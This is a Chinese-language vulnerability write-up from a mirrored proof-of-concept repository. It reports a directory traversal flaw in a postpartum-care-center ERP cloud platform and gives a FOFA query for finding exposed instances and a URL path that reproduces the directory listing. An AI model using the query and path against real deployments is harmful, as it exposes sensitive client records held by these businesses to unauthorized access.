admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/月子会所ERP/月子会所ERP管理云平台存在目录遍历漏洞.md

25 lines
987 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 月子会所ERP管理云平台存在目录遍历漏洞
# 一、漏洞简介
月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件管控月子中心经营过程中各个环节。武汉金同方科技月子会ERP管理云平台存在目录遍历漏洞攻击者可利用该漏洞获取敏感信息。
# 二、影响版本
+ 月子会所ERP管理云平台
# 三、资产测绘
+ fofa`product="妈妈宝盒-ERP"`
+ 登录页面
![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/26m4xlcMgRMyEUJ7/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-437960.png)
# 四、漏洞复现
```plain
http://xx.xx.xx.xx/Page/
```
![1693186499483-de262214-f715-46e2-9591-44bfe7eb1c08.png](./img/26m4xlcMgRMyEUJ7/1693186499483-de262214-f715-46e2-9591-44bfe7eb1c08-999200.png)
> 更新: 2024-02-29 23:55:51
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ybopp6ucfh9lsdrz>
Reference in New Issue Copy Permalink